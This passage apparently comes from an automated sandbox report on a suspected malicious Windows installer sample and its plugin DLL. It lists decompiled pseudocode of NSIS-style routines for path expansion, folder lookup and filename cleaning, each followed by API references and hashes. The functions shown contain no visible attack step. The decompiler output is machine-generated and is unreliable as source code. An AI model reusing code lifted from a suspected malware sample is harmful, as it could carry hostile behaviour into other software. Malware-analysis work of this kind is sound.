                                                                                                                          										WideCharToMultiByte(0, 0,  *_t64,  *0x10004058, _t65,  *0x10004058, 0, 0);
                                                                                                                          									} else {
                                                                                                                          										_t42 = _t39 - 1;
                                                                                                                          										if(_t42 == 0) {
                                                                                                                          											_t63 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
                                                                                                                          											_push( *0x10004058 +  *0x10004058);
                                                                                                                          											_push(_t63);
                                                                                                                          											_push( *_t64);
                                                                                                                          											" {*v@u*v"();
                                                                                                                          											WideCharToMultiByte(0, 0, _t63,  *0x10004058, _t65,  *0x10004058, 0, 0);
                                                                                                                          											GlobalFree(_t63);
                                                                                                                          											L15:
                                                                                                                          											_t61 = 0;
                                                                                                                          										} else {
                                                                                                                          											if(_t42 == 1) {
                                                                                                                          												_push( *_t55);
                                                                                                                          												L12:
                                                                                                                          												wsprintfA(_t65, 0x10004008);
                                                                                                                          												L13:
                                                                                                                          												_t66 = _t66 + 0xc;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t23 = _t55[5];
                                                                                                                          					if(_t23 != _t61 && ( *_a4 != 2 ||  *((intOrPtr*)(_t55 - 4)) > _t61)) {
                                                                                                                          						GlobalFree(_t23);
                                                                                                                          					}
                                                                                                                          					_t24 = _t55[4];
                                                                                                                          					if(_t24 != _t61) {
                                                                                                                          						if(_t24 != 0xffffffff) {
                                                                                                                          							if(_t24 > _t61) {
                                                                                                                          								E1000160E(_t24 - 1, _t65);
                                                                                                                          								goto L32;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E1000159E(_t65);
                                                                                                                          							L32:
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t25 = GlobalFree(_t65);
                                                                                                                          					_v4 = _v4 - 1;
                                                                                                                          					_t55 = _t55 - 0x20;
                                                                                                                          				} while (_v4 >= _t61);
                                                                                                                          				return _t25;
                                                                                                                          			}
























                                                                                                                          0x1000269f
                                                                                                                          0x100026a6
                                                                                                                          0x100026ac
                                                                                                                          0x100026ac
                                                                                                                          0x10002650
                                                                                                                          0x10002651
                                                                                                                          0x10002657
                                                                                                                          0x10002659
                                                                                                                          0x1000265f
                                                                                                                          0x10002665
                                                                                                                          0x10002665
                                                                                                                          0x10002665
                                                                                                                          0x10002651
                                                                                                                          0x1000264e
                                                                                                                          0x1000264b
                                                                                                                          0x10002648
                                                                                                                          0x10002641
                                                                                                                          0x1000263a
                                                                                                                          0x10002712
                                                                                                                          0x10002717
                                                                                                                          0x10002728
                                                                                                                          0x10002728
                                                                                                                          0x1000272e
                                                                                                                          0x10002733
                                                                                                                          0x10002738
                                                                                                                          0x10002744
                                                                                                                          0x10002749
                                                                                                                          0x00000000
                                                                                                                          0x1000274e
                                                                                                                          0x1000273a
                                                                                                                          0x1000273b
                                                                                                                          0x1000274f
                                                                                                                          0x1000274f
                                                                                                                          0x10002738
                                                                                                                          0x10002751
                                                                                                                          0x10002757
                                                                                                                          0x1000275b
                                                                                                                          0x1000275e
                                                                                                                          0x1000276d

                                                                                                                          APIs
                                                                                                                          • wsprintfA.USER32 ref: 1000265F
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,10001A8A,00000000), ref: 10002677
                                                                                                                          • StringFromGUID2.OLE32(?,00000000,?,?,?,?,00000000,00000001,10001A8A,00000000), ref: 1000268A
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,10001A8A,00000000), ref: 1000269F
                                                                                                                          • GlobalFree.KERNEL32 ref: 100026A6
                                                                                                                            • Part of subcall function 1000160E: lstrcpyA.KERNEL32(-10004047,00000000,?,1000118F,?,00000000), ref: 10001636
                                                                                                                          • GlobalFree.KERNEL32 ref: 10002728
                                                                                                                          • GlobalFree.KERNEL32 ref: 10002751
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                                          • String ID: {*v@u*v
                                                                                                                          • API String ID: 2278267121-3183337590
                                                                                                                          • Opcode ID: f2d90fb7604344b88e62606892e29dab83ffb9f5e480ef13eb80547e1e232e8e
                                                                                                                          • Instruction ID: 08b3d8036d164c5881487be7a8a394305a4816547ccba51f0c52e2d45aca7b17
                                                                                                                          • Opcode Fuzzy Hash: f2d90fb7604344b88e62606892e29dab83ffb9f5e480ef13eb80547e1e232e8e
                                                                                                                          • Instruction Fuzzy Hash: 97419D71109555EFF712DF24CC88E2BBBEDFB843C0B124519FA45C616DDB32AC509A21
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E004059FF(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                          				signed int _v8;
                                                                                                                          				struct _ITEMIDLIST* _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed char _v28;
                                                                                                                          				signed int _t36;
                                                                                                                          				CHAR* _t37;
                                                                                                                          				signed int _t39;
                                                                                                                          				int _t40;
                                                                                                                          				char _t50;
                                                                                                                          				char _t51;
                                                                                                                          				char _t53;
                                                                                                                          				char _t55;
                                                                                                                          				void* _t63;
                                                                                                                          				signed int _t69;
                                                                                                                          				intOrPtr _t73;
                                                                                                                          				signed int _t74;
                                                                                                                          				signed int _t75;
                                                                                                                          				intOrPtr _t79;
                                                                                                                          				char _t83;
                                                                                                                          				void* _t85;
                                                                                                                          				CHAR* _t86;
                                                                                                                          				void* _t88;
                                                                                                                          				signed int _t95;
                                                                                                                          				signed int _t97;
                                                                                                                          				void* _t98;
                                                                                                                          
                                                                                                                          				_t88 = __esi;
                                                                                                                          				_t85 = __edi;
                                                                                                                          				_t63 = __ebx;
                                                                                                                          				_t36 = _a8;
                                                                                                                          				if(_t36 < 0) {
                                                                                                                          					_t79 =  *0x42365c; // 0x48b9e6
                                                                                                                          					_t36 =  *(_t79 - 4 + _t36 * 4);
                                                                                                                          				}
                                                                                                                          				_t73 =  *0x423eb8; // 0x48a39c
                                                                                                                          				_t74 = _t73 + _t36;
                                                                                                                          				_t37 = 0x422e20;
                                                                                                                          				_push(_t63);
                                                                                                                          				_push(_t88);
                                                                                                                          				_push(_t85);
                                                                                                                          				_t86 = 0x422e20;
                                                                                                                          				if(_a4 - 0x422e20 < 0x800) {
                                                                                                                          					_t86 = _a4;
                                                                                                                          					_a4 = _a4 & 0x00000000;
                                                                                                                          				}
                                                                                                                          				while(1) {
                                                                                                                          					_t83 =  *_t74;
                                                                                                                          					if(_t83 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					__eflags = _t86 - _t37 - 0x400;
                                                                                                                          					if(_t86 - _t37 >= 0x400) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t74 = _t74 + 1;
                                                                                                                          					__eflags = _t83 - 0xfc;
                                                                                                                          					_a8 = _t74;
                                                                                                                          					if(__eflags <= 0) {
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							 *_t86 = _t83;
                                                                                                                          							_t86 =  &(_t86[1]);
                                                                                                                          							__eflags = _t86;
                                                                                                                          						} else {
                                                                                                                          							 *_t86 =  *_t74;
                                                                                                                          							_t86 =  &(_t86[1]);
                                                                                                                          							_t74 = _t74 + 1;
                                                                                                                          						}
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					_t39 =  *(_t74 + 1);
                                                                                                                          					_t75 =  *_t74;
                                                                                                                          					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                                                                          					_a8 = _a8 + 2;
                                                                                                                          					_v28 = _t75 | 0x00000080;
                                                                                                                          					_t69 = _t75;
                                                                                                                          					_v24 = _t69;
                                                                                                                          					__eflags = _t83 - 0xfe;
                                                                                                                          					_v20 = _t39 | 0x00000080;
                                                                                                                          					_v16 = _t39;
                                                                                                                          					if(_t83 != 0xfe) {
                                                                                                                          						__eflags = _t83 - 0xfd;
                                                                                                                          						if(_t83 != 0xfd) {
                                                                                                                          							__eflags = _t83 - 0xff;
                                                                                                                          							if(_t83 == 0xff) {
                                                                                                                          								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                                                                          								E004059FF(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                                                                          							}
                                                                                                                          							L41:
                                                                                                                          							_t40 = lstrlenA(_t86);
                                                                                                                          							_t74 = _a8;
                                                                                                                          							_t86 =  &(_t86[_t40]);
                                                                                                                          							_t37 = 0x422e20;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						__eflags = _t95 - 0x1d;
                                                                                                                          						if(_t95 != 0x1d) {
                                                                                                                          							__eflags = (_t95 << 0xa) + 0x424000;
                                                                                                                          							E004059DD(_t86, (_t95 << 0xa) + 0x424000);
                                                                                                                          						} else {
                                                                                                                          							E0040593B(_t86,  *0x423e88);
                                                                                                                          						}
                                                                                                                          						__eflags = _t95 + 0xffffffeb - 7;
                                                                                                                          						if(_t95 + 0xffffffeb < 7) {
                                                                                                                          							L32:
                                                                                                                          							E00405C3F(_t86);
                                                                                                                          						}
                                                                                                                          						goto L41;
                                                                                                                          					}
                                                                                                                          					_t97 = 2;
                                                                                                                          					_t50 = GetVersion();
                                                                                                                          					__eflags = _t50;
                                                                                                                          					if(_t50 >= 0) {
                                                                                                                          						L12:
                                                                                                                          						_v8 = 1;
                                                                                                                          						L13:
                                                                                                                          						__eflags =  *0x423f04;
                                                                                                                          						if( *0x423f04 != 0) {
                                                                                                                          							_t97 = 4;
                                                                                                                          						}
                                                                                                                          						__eflags = _t69;
                                                                                                                          						if(_t69 >= 0) {
                                                                                                                          							__eflags = _t69 - 0x25;
                                                                                                                          							if(_t69 != 0x25) {
                                                                                                                          								__eflags = _t69 - 0x24;
                                                                                                                          								if(_t69 == 0x24) {
                                                                                                                          									GetWindowsDirectoryA(_t86, 0x400);
                                                                                                                          									_t97 = 0;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t97;
                                                                                                                          									if(_t97 == 0) {
                                                                                                                          										goto L29;
                                                                                                                          									}
                                                                                                                          									_t51 =  *0x423e84; // 0x74691340
                                                                                                                          									_t97 = _t97 - 1;
                                                                                                                          									__eflags = _t51;
                                                                                                                          									if(_t51 == 0) {
                                                                                                                          										L25:
                                                                                                                          										_t53 = SHGetSpecialFolderLocation( *0x423e88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                                                                          										__eflags = _t53;
                                                                                                                          										if(_t53 != 0) {
                                                                                                                          											L27:
                                                                                                                          											 *_t86 =  *_t86 & 0x00000000;
                                                                                                                          											__eflags =  *_t86;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                                                                          										__imp__CoTaskMemFree(_v12);
                                                                                                                          										__eflags = _t53;
                                                                                                                          										if(_t53 != 0) {
                                                                                                                          											goto L29;
                                                                                                                          										}
                                                                                                                          										goto L27;
                                                                                                                          									}
                                                                                                                          									__eflags = _v8;
                                                                                                                          									if(_v8 == 0) {
                                                                                                                          										goto L25;
                                                                                                                          									}
                                                                                                                          									_t55 =  *_t51( *0x423e88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                                                                                          									__eflags = _t55;
                                                                                                                          									if(_t55 == 0) {
                                                                                                                          										goto L29;
                                                                                                                          									}
                                                                                                                          									goto L25;
                                                                                                                          								}
                                                                                                                          								goto L29;
                                                                                                                          							}
                                                                                                                          							GetSystemDirectoryA(_t86, 0x400);
                                                                                                                          							goto L29;
                                                                                                                          						} else {
                                                                                                                          							_t72 = (_t69 & 0x0000003f) +  *0x423eb8;
                                                                                                                          							E004058C4(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423eb8, _t86, _t69 & 0x00000040);
                                                                                                                          							__eflags =  *_t86;
                                                                                                                          							if( *_t86 != 0) {
                                                                                                                          								L30:
                                                                                                                          								__eflags = _v16 - 0x1a;
                                                                                                                          								if(_v16 == 0x1a) {
                                                                                                                          									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                          								}
                                                                                                                          								goto L32;
                                                                                                                          							}
                                                                                                                          							E004059FF(_t72, _t86, _t97, _t86, _v16);
                                                                                                                          							L29:
                                                                                                                          							__eflags =  *_t86;
                                                                                                                          							if( *_t86 == 0) {
                                                                                                                          								goto L32;
                                                                                                                          							}
                                                                                                                          							goto L30;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					__eflags = _t50 - 0x5a04;
                                                                                                                          					if(_t50 == 0x5a04) {
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					__eflags = _v16 - 0x23;
                                                                                                                          					if(_v16 == 0x23) {
                                                                                                                          						goto L12;
                                                                                                                          					}
                                                                                                                          					__eflags = _v16 - 0x2e;
                                                                                                                          					if(_v16 == 0x2e) {
                                                                                                                          						goto L12;
                                                                                                                          					} else {
                                                                                                                          						_v8 = _v8 & 0x00000000;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *_t86 =  *_t86 & 0x00000000;
                                                                                                                          				if(_a4 == 0) {
                                                                                                                          					return _t37;
                                                                                                                          				}
                                                                                                                          				return E004059DD(_a4, _t37);
                                                                                                                          			}






























                                                                                                                          0x00405abd
                                                                                                                          0x00405ac1
                                                                                                                          0x00000000
                                                                                                                          0x00405ac3
                                                                                                                          0x00405ac3
                                                                                                                          0x00000000
                                                                                                                          0x00405ac3
                                                                                                                          0x00405ac1
                                                                                                                          0x00405c26
                                                                                                                          0x00405c30
                                                                                                                          0x00405c3c
                                                                                                                          0x00405c3c
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405AA7
                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00405B22
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405B35
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0040F020), ref: 00405B71
                                                                                                                          • SHGetPathFromIDListA.SHELL32(0040F020,Call), ref: 00405B7F
                                                                                                                          • CoTaskMemFree.OLE32(0040F020), ref: 00405B8A
                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                                                                                                          • lstrlenA.KERNEL32(Call,00000000,0041FC50,00000000,00404DB3,0041FC50,00000000), ref: 00405BFE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                          • Opcode ID: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                                                          • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                                                                                                          • Opcode Fuzzy Hash: 4882c5000ece73840c27ef34f72b9de924b5e58c0caf7ba4a0b851a4f11f77ef
                                                                                                                          • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E10002440(void* __edx, intOrPtr _a4) {
                                                                                                                          				signed int _v4;
                                                                                                                          				CHAR* _t32;
                                                                                                                          				intOrPtr _t33;
                                                                                                                          				void* _t34;
                                                                                                                          				void* _t36;
                                                                                                                          				void* _t43;
                                                                                                                          				void** _t49;
                                                                                                                          				CHAR* _t58;
                                                                                                                          				void* _t59;
                                                                                                                          				signed int* _t60;
                                                                                                                          				void* _t61;
                                                                                                                          				intOrPtr* _t62;
                                                                                                                          				CHAR* _t63;
                                                                                                                          				void* _t73;
                                                                                                                          
                                                                                                                          				_t59 = __edx;
                                                                                                                          				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                                                          				while(1) {
                                                                                                                          					_t9 = _a4 + 0x818; // 0x818
                                                                                                                          					_t62 = (_v4 << 5) + _t9;
                                                                                                                          					_t32 =  *(_t62 + 0x14);
                                                                                                                          					if(_t32 == 0) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					_t58 = 0x1a;
                                                                                                                          					if(_t32 == _t58) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					if(_t32 != 0xffffffff) {
                                                                                                                          						if(_t32 <= 0 || _t32 > 0x19) {
                                                                                                                          							 *(_t62 + 0x14) = _t58;
                                                                                                                          						} else {
                                                                                                                          							_t32 = E100015E5(_t32 - 1);
                                                                                                                          							L10:
                                                                                                                          						}
                                                                                                                          						goto L11;
                                                                                                                          					} else {
                                                                                                                          						_t32 = E10001561();
                                                                                                                          						L11:
                                                                                                                          						_t63 = _t32;
                                                                                                                          						_t13 = _t62 + 8; // 0x820
                                                                                                                          						_t60 = _t13;
                                                                                                                          						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
                                                                                                                          							_t49 = _t60;
                                                                                                                          						} else {
                                                                                                                          							_t49 =  *_t60;
                                                                                                                          						}
                                                                                                                          						_t33 =  *_t62;
                                                                                                                          						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
                                                                                                                          						if(_t33 == 0) {
                                                                                                                          							 *_t60 =  *_t60 & 0x00000000;
                                                                                                                          						} else {
                                                                                                                          							if(_t33 == 1) {
                                                                                                                          								_t36 = E10001641(_t63);
                                                                                                                          								L27:
                                                                                                                          								 *_t49 = _t36;
                                                                                                                          								L31:
                                                                                                                          								_t34 = GlobalFree(_t63);
                                                                                                                          								if(_v4 == 0) {
                                                                                                                          									return _t34;
                                                                                                                          								}
                                                                                                                          								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                                                          									_v4 = _v4 + 1;
                                                                                                                          								} else {
                                                                                                                          									_v4 = _v4 & 0x00000000;
                                                                                                                          								}
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t33 == 2) {
                                                                                                                          								 *_t49 = E10001641(_t63);
                                                                                                                          								_t49[1] = _t59;
                                                                                                                          								goto L31;
                                                                                                                          							}
                                                                                                                          							_t73 = _t33 - 3;
                                                                                                                          							if(_t73 == 0) {
                                                                                                                          								_t36 = E10001550(_t63);
                                                                                                                          								 *(_t62 + 0x1c) = _t36;
                                                                                                                          								goto L27;
                                                                                                                          							}
                                                                                                                          							if(_t73 > 0) {
                                                                                                                          								if(_t33 <= 5) {
                                                                                                                          									_t61 = GlobalAlloc(0x40,  *0x10004058 +  *0x10004058);
                                                                                                                          									 *(_t62 + 0x1c) = _t61;
                                                                                                                          									MultiByteToWideChar(0, 0, _t63,  *0x10004058, _t61,  *0x10004058);
                                                                                                                          									if( *_t62 != 5) {
                                                                                                                          										 *_t49 = _t61;
                                                                                                                          									} else {
                                                                                                                          										_t43 = GlobalAlloc(0x40, 0x10);
                                                                                                                          										 *(_t62 + 0x1c) = _t43;
                                                                                                                          										 *_t49 = _t43;
                                                                                                                          										__imp__CLSIDFromString(_t61, _t43);
                                                                                                                          										GlobalFree(_t61);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t33 == 6 && lstrlenA(_t63) > 0) {
                                                                                                                          										 *_t60 = E1000276E(E10001641(_t63));
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L31;
                                                                                                                          					}
                                                                                                                          					L9:
                                                                                                                          					_t32 = E10001550(0x10004034);
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          			}

















                                                                                                                          0x10002540
                                                                                                                          0x10002562
                                                                                                                          0x10002542
                                                                                                                          0x10002546
                                                                                                                          0x1000254d
                                                                                                                          0x10002551
                                                                                                                          0x10002553
                                                                                                                          0x1000255a
                                                                                                                          0x1000255a
                                                                                                                          0x100024eb
                                                                                                                          0x100024ee
                                                                                                                          0x10002510
                                                                                                                          0x10002512
                                                                                                                          0x100024ee
                                                                                                                          0x100024e9
                                                                                                                          0x100024e0
                                                                                                                          0x00000000
                                                                                                                          0x100024bf
                                                                                                                          0x1000249b
                                                                                                                          0x100024a0
                                                                                                                          0x00000000
                                                                                                                          0x100024a0

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 100024F5
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000251F
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 10002537
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 10002546
                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 10002553
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000255A
                                                                                                                          • GlobalFree.KERNEL32 ref: 1000258E
                                                                                                                            • Part of subcall function 10001550: lstrcpyA.KERNEL32(00000000,?,10001607,?,100011A1,-000000A0), ref: 1000155A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpylstrlen
                                                                                                                          • String ID: @u*v
                                                                                                                          • API String ID: 520554397-1046951355
                                                                                                                          • Opcode ID: 73698bcf168bc25748ca8d9a57d83aa9733e480b4e517d970f119df6c2bd3c01
                                                                                                                          • Instruction ID: 5e8646e4445d362173c86146a51869b75f136194909619477c3c659b9c9ef311
                                                                                                                          • Opcode Fuzzy Hash: 73698bcf168bc25748ca8d9a57d83aa9733e480b4e517d970f119df6c2bd3c01
                                                                                                                          • Instruction Fuzzy Hash: 5041BB71505B02DFF324CF248C94B6AB7F8FB443E2F614919F946DA189DB70E8808B66
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405C3F(CHAR* _a4) {
                                                                                                                          				char _t5;
                                                                                                                          				char _t7;
                                                                                                                          				char* _t15;
                                                                                                                          				char* _t16;
                                                                                                                          				CHAR* _t17;
                                                                                                                          
                                                                                                                          				_t17 = _a4;
                                                                                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                          					_t17 =  &(_t17[4]);
                                                                                                                          				}
                                                                                                                          				if( *_t17 != 0 && E0040553D(_t17) != 0) {
                                                                                                                          					_t17 =  &(_t17[2]);
                                                                                                                          				}
                                                                                                                          				_t5 =  *_t17;
                                                                                                                          				_t15 = _t17;
                                                                                                                          				_t16 = _t17;
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					do {
                                                                                                                          						if(_t5 > 0x1f &&  *((char*)(E004054FB("*?|<>/\":", _t5))) == 0) {
                                                                                                                          							E00405675(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                          							_t16 = CharNextA(_t16);
                                                                                                                          						}
                                                                                                                          						_t17 = CharNextA(_t17);
                                                                                                                          						_t5 =  *_t17;
                                                                                                                          					} while (_t5 != 0);
                                                                                                                          				}
                                                                                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                          				while(1) {
                                                                                                                          					_t16 = CharPrevA(_t15, _t16);
                                                                                                                          					_t7 =  *_t16;
                                                                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                          					if(_t15 < _t16) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                          • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                          • CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C40, 00405C7B
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 00405C45
                                                                                                                          • *?|<>/":, xrefs: 00405C87
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-139789886
                                                                                                                          • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                          • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                                                                                                          • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                                                          • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403DF6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				long _t35;
                                                                                                                          				long _t37;
                                                                                                                          				void* _t40;
                                                                                                                          				long* _t49;
                                                                                                                          
                                                                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                                                                          					L15:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                          				if(_t49 == 0) {
                                                                                                                          					goto L15;
                                                                                                                          				}
                                                                                                                          				_t35 =  *_t49;
                                                                                                                          				if((_t49[5] & 0x00000002) != 0) {
                                                                                                                          					_t35 = GetSysColor(_t35);
                                                                                                                          				}
                                                                                                                          				if((_t49[5] & 0x00000001) != 0) {
                                                                                                                          					SetTextColor(_a8, _t35);
                                                                                                                          				}
                                                                                                                          				SetBkMode(_a8, _t49[4]);
                                                                                                                          				_t37 = _t49[1];
                                                                                                                          				_v16.lbColor = _t37;
                                                                                                                          				if((_t49[5] & 0x00000008) != 0) {
                                                                                                                          					_t37 = GetSysColor(_t37);
                                                                                                                          					_v16.lbColor = _t37;
                                                                                                                          				}
